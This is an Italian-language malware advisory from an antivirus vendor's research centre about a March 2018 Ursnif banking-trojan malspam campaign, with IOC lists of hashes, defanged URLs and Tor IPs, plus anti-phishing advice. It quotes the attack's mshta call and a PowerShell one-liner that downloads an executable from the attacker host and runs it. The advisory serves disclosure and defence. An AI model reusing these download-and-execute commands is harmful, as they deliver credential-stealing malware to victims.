TG Soft Security Software Specialist - Vir.IT eXplorer: AntiVirus-AntiSpyware-AntiMalware-AntiRansomware
Identifica virus/malwareIdentifica virus polimorfici grazie a DEEP SCANMacro Virus AnalyzerTecnologia INTRUSION DETECTIONTools rimozione virus/malwareInstallazione su Active DirectoryProtezione Real-Time 16/32/64 bitVir.IT Scan MailVir.IT Console Client/ServerVir.IT WebFilter ProtectionAggiornamenti automatici Live-UpdateVir.IT Personal FirewallAssistenza tecnica in lingua italianaCentro Ricerche Anti Malware


Attiva la tua Licenza Invia file sospetto Newsletter

fb rss linkedin twitter

ICSA Lab ICSA Lab

Vir.IT eXplorer PRO supera il test internazionale VB100 2018-08

AMTSO

OpsWat



EICAR Membro SERIT - Security Research in ITaly

09/03/2018 11:45:45 - Attenzione: Campagna di malspam che distribuisce il malware Ursnif del 9 marzo 2018

      
 
 
 

Analisi da parte del C.R.A.M. (Centro di Ricerca Anti-Malware) di TG Soft della campagna di mail che diffonde il malware Ursnif in data 09 marzo 2018

Per gli invii massivi di mail fraudolente, vengono utilizzati i metodi di "ingegneria sociale" che sono sviluppati da persone/cyber-criminali per indurre la vittima ad aprire gli allegati infetti oppure a cliccare sui link presenti nel corpo del messaggio.
Se hai ricevuto un email sospetta, inviala al C.R.A.M. (Centro di Ricerca Anti-Malware): Come inviare mail sospette

INDICE

 

Campagna malware "Ursnif"

Famiglia malware: Ursnif
VirIT: Trojan.Win32.Ursnif.EN, Trojan.DOC.Dropper.ON, Trojan.DOC.Dropper.OM

Descrizione
:
La campagna di mail è partita questa mattina in data 09 marzo 2018

Oggetto: [cambia in base alla mail che si riceve]

Buongiorno,

 

Vedi allegato e di confermare.

Come si diffonde:
Sfrutta gli account di posta elettronica configurati nel pc infettato, inviando finte risposte infette, a dei messaggi che sono stati GIA RICEVUTI in precedenza dalla vittima stessa.
Il corpo del messaggio è sempre lo stesso (visibile qui sopra in rosso), invece l'oggetto è diverso proprio perchè rispondendo a dei messaggi che la vittima ha ricevuto, nei giorni precedenti, varia in base ad essi.
L'allegato malevole presente nella mail è un file DOC che al suo interno contiene una MACRO AutoClose che appena viene avviata scarica il malware e lo mette in esecuzione.
 

La macro Autoclose prima esegue il file MSHTA.EXE passandogli come parametro l'indirizzo url da cui scaricare uno script per PowerShell:
 
C:\Windows\System32\mshta.exe http://auwhguahsdusahdsd[.]com/REX/slick[.]php?utma=itnerd

A questo punto viene scaricato uno script ed eseguito da PowerShell:

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  -Exec Bypass -NoExit -Command (New-Object System.Net.WebClient).DownloadFile('http://auwhguahsdusahdsd[.]com/NOC/itnerd[.]class', $env:APPDATA + '\\f0b41f3.exe'); Start-Process $env:APPDATA'\\f0b41f3.exe'; (New-Object System.Net.WebClient).DownloadString('http://auwhguahsdusahdsd[.]com/REX/freddie[.]php?l=itnerd'); 

Lo script di PoweShell fa il download dell'Ursnif dal sito http://auwhguahsdusahdsd[.]com/NOC/itnerd[.]class e lo mette in esecuzione automatica.

Dei file DOC analizzati i siti da dove viene scaricato il malware sono i seguenti:
  • http://auwhguahsdusahdsd[.]com/REX/slick[.]php?utma=itnerd
  • http://auwhguahsdusahdsd[.]com/NOC/itnerd[.]class
  • http://auwhguahsdusahdsd[.]com/REX/freddie[.]php?l=itnerd

Il malware dopo venir avviato crea una chiave in HKCU\Software\Microsoft\Windows\CurrentVersion\Run con [valore casuale] = %USERPROFILE%\APPDATA\ROAMING\MICROSOFT\[CARTELLA CASUALE]\NOMEFILE.EXE
Il malware Ursnif fa un injection nel process EXPLORER.EXE

Esempi:
Nome: ACLU8THK.EXE
MD5: 3DE11A393F9376C928B2D8CEA7EE4744
Dimensione: 394.752 byte
Data di compilazione: 09/03/2018 03.26.42

Nome: APPIASDS.EXE
MD5: EE1B1D695CE9DD10E34E4859AA2D8E87
Dimensione: 445.712 byte
Data di compilazione: 09/03/2018 08.10.25
 

Note:
Il malware che viene scaricato fa parte della famiglia degli Ursnif, le sue peculiarità sono quelle di carpire password di accesso a siti importanti come possono essere home banking, posta, ftp etc.

IOC:
 
File DOC MD5:
009E418C23008DBFA822CC77834F21EA
0DE8916665C11B76516336A705444F09
1CC733CEA05F83552A7B0F297D5C88F6
24F007E217C5F37124588A17E1C341E8
30FD4C64074BB30E2A50038A92EFAA6C
444FAD5850FA6ACD780C89DA4EA0ACE8
4A0790CD1D27ACE1E6481398ECE32F8C
4B975321733C73F70A65F1FD489D10CF
4C9E026FB64E7D63DC21F98D380CA0D7
6FAE6B27BC91BEDEF51D5046720D0F1C
75634D68D9F162380ABC0AF8BAD20DA7
7EAA57DCC1FA83662C0F2E26ED52BEF8
7F87732379661DBB19A93F3EB1A354D1
871BB91657BCB31A909B3B7DB17727B8
9EE85BA5FDFA6E88EC30BA2733A5F4FA
A2DC123791E75121FE03A60497AD03FB
A4236F32C28BA2F72D2FE0A8B8F9829C
A5D58B583E42C8AD5E07FD48559421DC
AE2E24AB2ED8BAC1CC6326B16F56B4E4
BC2D30BAC1584B539EE6C9BD0B2759D8
CEB5B8FF653221F5000F489844F9E149
D00743082B6167BB1493B1589D9F00BB
DB796A8719C4A037134CD5C78B51BDCF
E1EC19D2B150EB4897AEBC73A6096639
FA791AE1467A9939B643388F1A9536B1
FD1C8219BD982577418394F14844A5D1

File EXE MD5:
3DE11A393F9376C928B2D8CEA7EE4744
BA732A11F27DA190EF0AC40E6F7CC151
EE1B1D695CE9DD10E34E4859AA2D8E87


URL:
http://auwhguahsdusahdsd[.]com/REX/slick[.]php?utma=itnere
http://auwhguahsdusahdsd[.]com/REX/slick[.]php?utma=itnerd
http://auwhguahsdusahdsd[.]com/REX/slick[.]php?utma=itnerc
http://auwhguahsdusahdsd[.]com/REX/slick[.]php?utma=itnerb
http://auwhguahsdusahdsd[.]com/REX/slick[.]php?utma=itnera
http://auwhguahsdusahdsd[.]com/REX/slick[.]php?utma=itner
http://auwhguahsdusahdsd[.]com/NOC/itnere[.]class
http://auwhguahsdusahdsd[.]com/NOC/itnerd[.]class
http://auwhguahsdusahdsd[.]com/NOC/itnerc[.]class
http://auwhguahsdusahdsd[.]com/NOC/itnerb[.]class
http://auwhguahsdusahdsd[.]com/NOC/itnera[.]class
http://auwhguahsdusahdsd[.]com/NOC/itner[.]class
http://auwhguahsdusahdsd[.]com/REX/freddie[.]php?l=itnere
http://auwhguahsdusahdsd[.]com/REX/freddie[.]php?l=itnerd
http://auwhguahsdusahdsd[.]com/REX/freddie[.]php?l=itnerc
http://auwhguahsdusahdsd[.]com/REX/freddie[.]php?l=itnera
http://auwhguahsdusahdsd[.]com/REX/freddie[.]php?l=itner

Smtp contattati:
smtp.rambler.ru (ip: 81.19.77.165)

Tor IP contattati:
138.197.168.63:443
142.44.210.91:9001
146.185.189.197:443
158.69.119.35:9001
159.203.178.178:443
161.97.195.50:443
162.209.96.48:443
163.172.175.174:9001
163.172.216.195:9001
167.114.113.134:9001
176.31.101.92:9938
176.9.133.154:110
176.9.54.142:9001
178.159.0.38:443
178.16.208.56:443
178.16.208.59:443
178.32.189.88:443
178.32.61.9:9001
178.62.43.5:443
178.79.161.177:9001
18.82.3.136:9001
185.106.122.188:443
185.129.249.124:9001
185.22.174.46:9001
185.86.151.231:9001
188.241.58.216:443
192.52.167.71:443
192.99.13.48:9001
193.11.114.45:9002
194.63.142.11:443
195.154.250.239:443
195.181.216.59:443
195.201.20.82:21
195.62.53.196:16465
212.32.230.216:810
212.51.134.123:9001
213.152.168.27:443
217.182.198.76:9001
217.197.91.145:443
217.79.178.60:443
37.200.99.251:9001
46.101.104.245:9001
46.101.183.160:443
46.20.35.114:443
5.135.234.164:9001
5.39.33.178:9001
5.9.121.207:443
50.7.151.47:443
51.15.92.182:443
51.175.193.142:443
54.36.120.156:443
54.88.165.229:80
62.210.123.24:443
62.210.204.55:9031
77.87.49.6:8080
77.87.49.6:9002
78.142.19.11:443
78.46.217.214:443
85.204.74.139:443
85.25.43.31:443
86.110.117.166:7588
86.59.21.38:443
87.122.34.72:9001
87.73.84.77:443
91.121.23.100:8001
91.121.23.100:9001
91.233.116.51:443
93.115.91.66:443
93.180.157.154:9001
94.130.183.13:443
95.130.9.210:443
95.130.9.76:9001
95.141.83.146:443
95.183.52.172:443


 
Torna ad inizio pagina

 


Come cercare di riconoscere una falsa mail

L'esperienza ed il buon senso sono le prime armi per non rimanere vittima di questo tipo di truffe.
E' fondamentale un'attenta lettura della mail, in tutti i suoi elementi. Diffidare da subito di allegati in formato ZIP e, se possibile, NON abilitare l'esecuzione automatica delle macro. E' fortemente sconsigliato impostare l'esecuzione automatica delle macro poichè la semplice apertura di file Word ed Excel vedrà l'immediata esecuzione delle macro senza alcun alert preventivo.
Nel caso in cui si fosse stati infettati da un Banker,  il consiglio da parte del C.R.A.M. di TG Soft è quello di prendere opportuni accorgimenti di sicurezza anche dopo la bonifica del/dei sistemi coinvolti come il cambio delle password più comunemente utilizzate nel web.
Nel caso in cui  la postazione coinvolta fosse stata utilizzata per operazioni di home-banking è consigliato anche un accertamento con il proprio istituto di credito.  


Come inviare e-mail sospette per l'analisi come possibili virus/malware/ransomware e/o tentativi di Phishing

L'invio di materiali da analizzare al Centro Ricerche Anti-Malware di TG Soft per l'analisi che è sempre e comunque gratuito può avvenire in tutta sicurezza in due modalità:
  1. qualsiasi e-mail che sia da considerarsi sospetta può essere inviata direttamente dalla posta elettronica del ricevente scegliento come modalità di invio "INOLTRA come ALLEGATO" e inserendo nell'oggetto "Possibile Phishing da verificare" piuttosto che "Possibile Malware da verificare" alla mail lite@virit.com
  2. salvare come file esterno al programma di posta elettronica utilizzato la mail da inviare al C.R.A.M. di TG Soft per l'analisi . Il file che ne risulterà dovrà essere inviato facendone l'Upload dalla pagina di INVIO File Sospetti (http://www.tgsoft.it/italy/file_sospetti.asp). Naturalmente per avere un feed-back rispetto al responso dell'analisi dei file infetti inviati sarà necessario indicare un indirizzo e-mail e sarà gradita una breve descrizione del motivo dell'invio del file (ad esempio: possiible/probabile phishing; possibile/probabile malware o altro).
Tutto questo per aiutare ad aiutarvi cercando di evitare che possiate incappare in furti di credenziali, virus/malware o ancor peggio Ransomware / Crypto-Malware di nuova generazione.
Torna ad inizio pagina
 


Integra la protezione del tuo PC/SERVER con Vir.IT eXplorer Lite

Se non doveste ancora utilizzare Vir.IT eXplorer PRO è consigliabile installare, ad integrazione dell'antivirus in uso per aumentare la sicurezza dei vostri computer, PC e SERVER indifferentemente, Vir.IT eXplorer Lite -FREE Edition-.

Vir.IT eXplorer Lite ha le seguenti caratteristiche peculiari:
  • liberamente utilizzabile sia in ambito privato sia in ambito aziendale con aggiornamenti Motore+Firme senza limitazioni temporali;
  • interoperabile con eventuali altri AntiVirus, AntiSpyware, AntiMalware o Internet Security già presenti su PC e SERVER, consigliato l'utilizzo ad integrazione dell'AntiVirus già in uso poichè non conflitta nè rallenta il sistema ma permette di aumentare sensibilmente la sicurezza in termini di identificazione e bonifica dei file infetti;
  • identifica e, in moltissimi casi, anche rimuove la maggior parte dei virus/malware realmente circolanti o, in alternativa, ne permette l'invio al C.R.A.M. Centro Ricerche Anti-Malware di TG Soft per l'analisi e l'aggiornamento di Vir.IT eXplorer per l'univoca identificazione e la corretta rimozione;
  • grazie alla tecnologia Intrusione Detection, resa disponibile anche nella versione Lite di Vir.IT eXplorer, il software è in grado di segnalare eventuali virus/malware di nuova generazione che si siano posti in esecuzione automatica e procedere all'invio dei file segnalati al C.R.A.M. di TG Soft.
  • Procedi al  download di Vir.IT eXplorer Lite dalla pagina ufficiale di distribuzione del sito di TG Soft.

Per i licenziatari in assistenza della versione PRO di Vir.IT eXplorer...

Per i possessori di Vir.IT eXplorer PRO è anche possibile contattare gratuitamente il supporto tecnico telefonico di TG Soft le cui modalità sono consultabili alla pagina del supporto CLIENTI.
 


C.R.A.M.

Centro Ricerche Anti-Malware di TG Soft

Torna ad inizio pagina





Utilizzabilità delle informative e delle immagine in esse contenute

Ogni informazione pubblicata sul nostro sito può essere utilizzata e pubblicata su altri siti internet, blog, forum, facebook a patto che venga sempre e comunque citata la fonte "Fonte: C.R.A.M. by TG Soft www.tgsoft.it" con link cliccabile all'informativa e/o pagina web originale da cui sono stati estrapolati contenuti testuali, spunti e/o immagini. Inoltre per ogni immagine utilizzata dovrà essere sempre indicata la fonte ed il link cliccabile alla pagina originale dell'informativa di prima pubblicazione. Per quanto riguarda le pubblicazioni cartacee sarà necessario citare la fonte esplicitamente "Fonte: C.R.A.M. by TG Soft www.tgsoft.it" ed in analogia alle pubblicata elettroniche i link sotto ad ogni immagine alla pagina web originale da cui sono state estratte.

Sarà gradito nel caso di utilizzo dell'informativa del C.R.A.M. by TG Soft www.tgsoft.it nella relazione di articoli di sintesi il riconoscimento/ringraziamento di seguito "Si ringrazia il Centro Ricerche Anti-Malware C.R.A.M. by TG Soft di cui segnaliamo il link diretto all'informativa originale:[link diretto cliccabile]"

fb rss linkedin twitter
 




Legal & Eula | Privacy | Disinstallazione

TG Soft S.r.l. - via Pitagora 11/b, 35030 Rubàno (PD), ITALIA - C.F. e P.IVA 03296130283